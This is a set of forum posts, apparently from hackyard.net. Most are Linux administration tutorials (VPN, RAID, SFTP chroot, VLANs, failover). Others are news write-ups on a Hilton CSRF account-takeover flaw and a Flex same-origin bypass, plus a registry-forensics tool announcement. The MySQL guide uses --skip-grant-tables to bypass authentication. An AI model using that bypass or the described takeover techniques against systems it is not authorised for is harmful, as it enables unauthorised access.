  14. sudo apt-get update sudo apt-get dist-upgrade cd ~/ wget [url]https://raw.github.com/flexiondotorg/oab-java6/master/oab-java.sh[/url] -Ooab-java6.sh chmod +x oab-java6.sh sudo ./oab-java6.sh sudo apt-get install ant sudo wget [url=http://downloads.sourceforge.net/project/openvpn-als/adito/adito-0.9.1/adito-0.9.1-bin.tar.gz?use_mirror=iweb]307 Temporary Redirect[/url] sudo mv adito-0.9.1-bin.tar.gz /opt/ cd /opt sudo tar -xzf adito-0.9.1-bin.tar.gz cd adito-0.9.1 sudo ant install Using a browser go to: [url]http://ip_server:28080[/url] Create new cert Step 1 – Set Keystore Passphrase – Type password twice for Cert Step 1 – Create New Certificate – Fill outForm Step 2 – Configure User Database – Built-in Step 3 – Configure Super User – Fill out Form Step 4 – Configure Web Server – Leave defaults Step 5 – Configure Proxies – Leave blankunless you use proxy – Hit Next Step 6 – Summary Install Complete Go to CLI and exec: sudo ant install-service sudo ant start sudo pico /opt/adito-0.9.1/conf/wrapper.conf Delete # from wrapper.java.additional.2=-Dfile.encoding=UTF-8 sudo shutdown -r 1 Author: razvan1@hy
  15. Step # 1 : Stop MySQL service # /etc/init.d/mysql stop Output: Stopping MySQL database server: mysqld. Step # 2: Start to MySQL server w/o password: # mysqld_safe --skip-grant-tables & Output: [1] 5988 Starting mysqld daemon with databases from /var/lib/mysql mysqld_safe[6025]: started Step # 3: Connect to MySQL server using mysql client: # mysql -u root Output: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1 to server version:4.1.15-Debian_1-log Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> Step # 4: Setup new MySQL root user password mysql> use mysql; mysql> update user set password=PASSWORD("new_passwd") where User='root'; mysql> flush privileges; mysql> quit Step # 5: Stop MySQL Server: # /etc/init.d/mysql stop Output: Stopping MySQL database server: mysqld STOPPING server from pid file /var/run/mysqld/mysqld.pid mysqld_safe[6186]: ended [1]+ Done mysqld_safe--skip-grant-tables Step # 6: Start MySQL server and test it /etc/init.d/mysql start mysql -u root -p Credit's to: razvan1@hy
  16. For the begin you should add the next code in a file named log_users: #!/bin/bash # Author razvan1 # If have any issues send an PM on hackyard.net/forum FILE=/etc/bash.bashrc FILE1=/etc/rsyslog.d/bash.conf FILE2=/etc/init.d/rsyslog FILE3=/etc/logrotate.d/rsyslog if [ -f $FILE ]; then echo "export PROMPT_COMMAND='RETRN_VAL=$?;logger -p local6.debug "$(whoami) [$$]: $(history 1 | sed "s/^[ ]*[0-9]\+[ ]*//" )[$RETRN_VAL]"'" >> /etc/bash.bashrc else echo "File $FILE does not exists" exit 0 fi if [ -f $FILE1 ]; then echo "File $FILE1 exists. Delete it" exit 0 else touch /var/log/commands.log echo "local6.* /var/log/commands.log" >> /etc/rsyslog.d/bash.conf fi if [ -f $FILE3 ]; then sed '/"\var\log\messages"/a "\var\log\commands.log"' $FILE3 else echo "File $FILE3 does not exists" exit 0 fi if [ -f $FILE2 ]; then service rsyslog restart else echo "File $FILE2 does not exists. Install? [y/N]" read -p "Install rsyslog? [y/N] " -n 1 -r echo if [[ $REPLY =~ ^[Yy]$ ]] then apt-get install rsyslog -y else exit 0 fi fi After proceed this step use the command chmod +x log_users to be able to run the script and enjoy it Author: razvan1@hy
  17. For this let's think that sda is the first HDD and sdb is the second one. To do this we must do some steps: - Partitioning - Configure boot device - Create the new swap device - Configure LVM - Configure Grub On the first step, Partitioning, we should do the next: sfdisk -d > disks.out sfdisk /dev/sdb <disks.out parted /dev/sda set 1 raid on parted /dev/sda set 2 raid on parted /dev/sda set 3 raid on parted /dev/sda set 5 raid on parted /dev/sdb set 1 raid on parted /dev/sdb set 2 raid on parted /dev/sdb set 3 raid on parted /dev/sdb set 5 raid on mdadm --create /dev/md0 --level=1 --raid-disks=2 missing /dev/sdb1 --metadata=0.90 mdadm --create /dev/md1 --level=1 --raid-disks=2 missing /dev/sdb2 --metadata=1.0 mdadm --create /dev/md2 --level=1 --raid-disks=2 missing /dev/sdb3 --metadata=1.0 mdadm --create /dev/md3 --level=1 --raid-disks=2 missing /dev/sdb5 --metadata=1.0 After that we must configure the boot device: mkfs.ext4 /dev/md0 mkdir /mnt/md0 mount /dev/md0 /mnt/md0 cp -dpRx /boot/* /mnt/md0 sync umount /mnt/md0 rmdir /mnt/md0 umount /boot mount /dev/md0 /boot mdadm /dev/md0 -a /dev/sda1 mdadm -D /dev/md0 Finding the UUID using command: blkid |grep md0 /dev/md0: UUID="d43e4912-57b3-456a-8ef2-af747d37bead" TYPE="ext4" Uptate it in /etc/fstab: # grep boot /etc/fstab #UUID=3428cd4c1-c81b-4d94-240b-12f9020e870e /boot ext4 defaults 1 2 UUID=d43e4912-57b3-456a-8ef2-af747d37bead /boot ext4 defaults 1 2 Verify that both of your disks are listed in*/boot/grub/device.map add them if needed. cat /boot/grub/device.map (hd0) /dev/sda (hd1) /dev/sdb Install grub on both devices: grub-install /dev/sda grub-install /dev/sdb Create the new swap device mkswap /dev/md1 swapoff /dev/sda2 mdadm --add /dev/md1 /dev/sda2 swapon /dev/md1 blkid | grep md1 Update the /etc/fstab file. Configure LVM pvcreate /dev/md2 pvcreate /dev/md3 vgextend ROOTVOL /dev/md2 vgextend ROOTVOL /dev/md3 pvmove /dev/sda3 /dev/md2 pvmove /dev/sda5 /dev/md3 vgreduce ROOTVOL /dev/sda3 vgreduce ROOTVOL /dev/sda5 pvremove /dev/sda3 pvremove /dev/sda5 mdadm /dev/md2 -a /dev/sda3 mdadm /dev/md3 -a /dev/sda5 mdadm --examine --scan >/etc/mdadm.conf Configure Grub Remove rd_NO_MD from lines in /boot/grub/grub.conf dracut -f rm -f /etc/lvm/cache/.cache vgscan Entering grub: grub grub> find /grub/grub.conf root (hd0,0) setup (hd0) root (hd1,) setup (hd1) quit grub Author: razvan1@hy
  18. To be able to restric a Linux user to www folder and disable ssh access, in my example maned user_name, we should proceed some steps: 1) Edit file /etc/ssh/sshd_config and add the next lines AllowUsers [COLOR="#FF0000"]user_name[/COLOR] Match User [COLOR="#FF0000"]user_name[/COLOR] ChrootDirectory /var/www ForceCommand internal-sftp 2) Edit the file /etc/passwd like in the next example: [COLOR="#FF0000"]user_name[/COLOR]:1003:1002::/var/www:/bin/false 3) Add user to www-data group using command: usermod -a -G www-data [COLOR="#FF0000"]user_name[/COLOR] 4) The final step is to restart the ssh service to reload the configuration using one of the next commands: /etc/init.d/ssh restart or service ssh restart After this steps if we fill try to connect using ssh we will got the next message: root@kali:/home/razvan1# ssh [COLOR="#FF0000"]user_name[/COLOR]@192.168.1.1 [COLOR="#FF0000"]user_name[/COLOR]@192.168.1.1's password: This service allows sftp connections only. Connection to 192.168.1.1 closed. Author: razvan1@hy
  19. To install Dell OpenManage on Debian 7 we should proceed some steps. Let's think that we use a clean Debian 7 install. The first step in to run the next command to update the server: apt-get update && apt-get install sudo -y && apt-get upgrade -y After updating the system we should add some pre-requirements like libssl0.9.8 using commands: cd /tmp && wget http://ftp.us.debian.org/debian/pool/main/o/openssl/libssl0.9.8_0.9.8o-4squeeze14_amd64.deb dpkg -i libssl0.9.8_0.9.8o-4squeeze14_amd64.deb Now we will create a new file in sources.list: echo “deb http://linux.dell.com/repo/community/ubuntu wheezy openmanage” > /etc/apt/sources.list.d/linux.dell.com.sources.list Adding the keys: gpg --keyserver pool.sks-keyservers.net --recv-key 1285491434D8786F gpg -a --export 1285491434D8786F | sudo apt-key add - sudo apt-get update Install libcurl3 and OpenManage: apt-get install libcurl3 srvadmin-all -y Now we should change the run level because the default settings have a bug. Open file nano /etc/init.d/dsm_om_connsvc and change Default-Start and Default-Stop like in the next: # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 Now we will remove and add again dsm_om_connsvc with the new params: update-rc.d -f dsm_om_connsvc remove update-rc.d dsm_om_connsvc defaults update-rc.d dataeng defaults Restart the server and navigate to https://server_ip:1311 and login with your root user and password. Author: razvan1@hy
  20. For the begin we have few pre-requirements and we should install it: apt-get install sudo rpm rpm2cpio make libwww-perl -y Second step is to download and untar RINSE to /usr/src/ path: cd /usr/src/ wget http://collab-maint.alioth.debian.org/rinse/download/rinse_3.0.2.tar.gz tar vxfz rinse_3.0.2.tar.gz cd /usr/src/rinse To install one of the OS we should do command: rinse --arch amd64 --distribution [COLOR="#FF0000"]os_needed[/COLOR] --directory ./ List of possible OS to install: - centos-4 - centos-5 - centos-6 - fedora-7 - fedora-8 - fedora-9 - fedora-10 - fedora-11 - fedora-12 - fedora-13 - fedora-14 - fedora-15 - fedora-16 - fedora-17 - fedora-18 - fedora-19 - fedora-core-4 - fedora-core-5 - fedora-core-6 - opensuse-10.1 - opensuse-10.2 - opensuse-10.3 - opensuse-11.0 - opensuse-11.1 - opensuse-11.2 - opensuse-11.3 - opensuse-12.1 - opensuse-12.3 - opensuse-13.1 - rhel-5 - slc-5 - slc-6 Author: razvan1@hy
  21. For today we will try to load balance 2 Debian servers. This tool can be used for servers like Web, Application, Gateway and so on. Toold used for this is named UCARP and is very good for high-availability servers. To be able to use it we must install it for both servers named in this example WS1 and WS2 using command: ~# apt-get install ucarp -y Reading package lists... Done Building dependency tree Reading state information... Done The following extra packages will be installed: libpcap0.8 The following NEW packages will be installed: libpcap0.8 ucarp 0 upgraded, 2 newly installed, 0 to remove and 0 not upgraded. Need to get 165 kB of archives. After this operation, 504 kB of additional disk space will be used. After installing we should edit /etc/network/interfaces file on both servers. For WS1 the config file will look like the next one: auto eth0 iface eth0 inet static address 192.168.69.10 netmask 255.255.255.0 network 192.168.69.0 broadcast 192.168.1.255 gateway 192.168.69.1 ucarp-vid 2 ucarp-vip 192.168.69.2 ucarp-password Hackyard ucarp-advskew 10 ucarp-advbase 1 ucarp-master yes auto eth0:ucarp iface eth0:ucarp inet static address 192.168.69.12 netmask 255.255.255.255 For WS2 the config file will look like the next one: auto eth0 iface eth0 inet static address 192.168.69.11 netmask 255.255.255.0 network 192.168.69.0 broadcast 192.168.1.255 gateway 192.168.69.1 ucarp-vid 2 ucarp-vip 192.168.69.2 ucarp-password Hackyard ucarp-advskew 20 ucarp-advbase 1 ucarp-master no auto eth0:ucarp iface eth0:ucarp inet static address 192.168.69.12 netmask 255.255.255.255 After done editing both interfaces config file we will restart interfaces using command: # /etc/init.d/networking restart Now load-balancing server is done. Author: razvan1@hy
  22. This will be the shortest tut made by me because need only few changes. On the begin we will install VLAN packet. This will be done using command: # apt-get install vlan -y After this we will load 8021q module into the kernel using command; # sh -c 'grep -q 8021q /etc/modules || echo 8021q >> /etc/modules' Now the only thing required is to add VLANs into the /etc/network/interfaces file as next example: auto eth1 iface eth1 inet static address 192.168.0.101 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.254 dns-nameserver 8.8.8.8 # VLAN 69 auto vlan69 iface vlan69 inet static address 172.16.69.25 netmask 255.255.255.248 network 172.16.69.24 broadcast 172.16.69.31 vlan_raw_device eth2 # VLAN 96 auto vlan96 iface vlan96 inet static address 10.10.96.1 netmask 255.255.255.0 network 10.10.96.0 broadcast 10.10.96.255 mtu 1500 vlan_raw_device eth2 Now for the job to be done we will restart networking and all will be done # /etc/init.d/networking restart * Reconfiguring network interfaces... ssh start/running, process 1400 Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config Added VLAN with VID == 69 to IF -:eth2:- ssh stop/waiting ssh start/running, process 1465 Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config Added VLAN with VID == 96 to IF -:eth2:- ssh stop/waiting ssh start/running, process 1530 [ OK ] To check if are up we will read file vlan/config using command # cat /proc/net/vlan/config. The output will be the next if all is good. VLAN Dev name | VLAN ID Name-Type: VLAN_NAME_TYPE_PLUS_VID_NO_PAD vlan69 | 69 | eth2 vlan96 | 96 | eth2 Author: razvan1@hy
  23. A cross-site request forgery (CSRF) vulnerability in the website of hotel chain Hilton Worldwide could have inadvertently compromised much of its users’ personal information. Ironically the since-fixed issue stemmed from a promotion the chain was offering to users if they changed their passwords on a benefits service it runs. As part of the offer, users who changed passwords associated with their Hilton Honors account before April 1 would be given 1,000 free awards points. According to Krebs on Security, until Hilton fixed a loophole in its system, the same promotion could have let anyone hijack the account of someone who switched his or her password as long as the attacker could guess their nine-digit account number correctly. By reconfiguring the site’s HTML and reloading the page, attackers could have gleaned additional information, like the customers’ email address, physical address, and the last four digits of any credit card number they may have had on file. Attackers basically would have had complete access to the person’s account. They could have changed the password associated with it, viewed upcoming and past trips, and allowed them to use the victim’s points to book future trips. The vulnerability could have even let the attackers liquidate the user’s account and funnel their points into prepaid debit cards or into another user’s account. Researchers Brandon Potter and JB Snyder at the security firm Bancsec logged into Krebs’ Hilton account and forwarded him screenshots as proof they had found a vulnerability. It was only after Krebs contacted the hotel company that it stopped allowing users to reset their passwords and fixed the issue. “Hilton Worldwide recently confirmed a vulnerability on a section of our Hilton Honors website, and we took immediate action to remediate the vulnerability,” Hilton said in statement, according to Krebs. On top of the CSRF vulnerability, apparently Hilton didn’t enforce users to re-enter their current passwords when changing to a new one. Its site even told users whether each nine-digit number they entered was valid, according to Krebs, something which could have compounded the issue further. Attackers could have rigged the PIN reset page checker to determine users’ PINs, Snyder told Krebs. “There are a billion combinations but this… could be easily automated,” Snyder said. Hilton Hotels did fix the issue and now forbids users from using a PIN as their password. Instead users are prompted to pick a password that consists of at least eight characters, one uppercase, and a number or special character. Users can apparently still change their password without entering their current password however. Source
  24. A four year old Adobe Flash patch did not properly resolve a vulnerable Flex application, and attackers can exploit the bug, which is said to affect some 30 percent of Alexa’s top 10 most popular sites in the world. LinkedIn security researcher Luca Carettoni and Mauro Gentile, a security consultant at Minded Security, presented their findings showing that Shockwave Flash files compiled by the vulnerable Flex software developers kit remain exploitable in fully updated Web browsers and Flash plugins. The researchers released partial details for the vulnerability along with mitigation information. They plan to release the full details of the bug and some proof-of-concept exploit in the near future, once they are confident there is a better understanding of the bug within the general public. Carettoni and Gentile have already informed the maintainers of popular websites affected by the vulnerability, and Adobe. If properly exploited, the bug could allow an attacker to steal information from affected systems through a same origin request forgery and even perform actions on behalf of users running vulnerable versions by performing cross-site forgery requests. In either case, the attackers would have to compel their victims to visit a maliciously crafted Web page. Practically speaking, it is possible to force the affected Flash movies to perform Same-Origin requests and return the responses back to the attacker In other words, the researchers say, hosting vulnerable SWF files leads to an “indirect” Same-Origin-Policy bypass in fully patched web browsers and plugins. “Practically speaking, it is possible to force the affected Flash movies to perform Same-Origin requests and return the responses back to the attacker,” the pair of researchers said in a blog post. “Since HTTP requests contain cookies and are issued from the victim’s domain, HTTP responses may contain private information including anti-CSRF tokens and user’s data.” Potential mitigations include recompiling Flex SDKs along with their static libraries, patching with the official Adobe patch tool and simply deleting them if they are not used. You can find Carettoni and Gentile‘s analysis on their respective sites, though these are reposts, so both reports contain the same content. Their slide’s are embedded below: Source
  25. Python Registry Parser The idea of this started out as one to duplicate Microsoft's autoruns tool to the extent possible with only offline registry hives. Then I started adding extra non-autorun(ish) registry keys and then it turned into more of a Windows Registry parser; hence the name change from autoreg-parse to python-regparse. I'm terrible at naming scripts/tools so this will have to suffice. I wrote about it here on my blog: https://sysforensics.org/2015/03/python-registry-parser.html Purpose/Reason I didn't like the output of other tools. I wanted to learn to write better Python code. Output This was a sticky point I had with alternative tools, and realizing this I thought hard and came to the conclusion if I want a tool that doesn't have messy output i'm going to have to make it custom user defined output, and then provide a fallback template file if a custom output isn't defined via the command line. This will likely turn some people off from using this tool, but I think it's the best way forward. I suggest taking a look here for some output examples: https://sysforensics.org/2015/03/python-registry-parser.html as it's not as complex as it may sound. Even for non-coders it's easy. How to Install Install Python 2.79 Install https://pypi.python.org/pypi/setuptools sudo pip install python-registry sudo pip install jinja2 wget https://github.com/sysforensics/python-regparse/blob/master/yapsy_mods/yapsy-master.zip Unzip it cd yapsy-master/package/ sudo python setup.py build sudo python setup.py install wget https://github.com/sysforensics/python-regparse/archive/master.zip Unzip Put it where you want, and then enjoy! I've tested/used on OSX, Windows and SIFT 3.0. If pip doesn't work for you try easy_install. Link: https://github.com/sysforensics/python-regparse
×
×
  • Create New...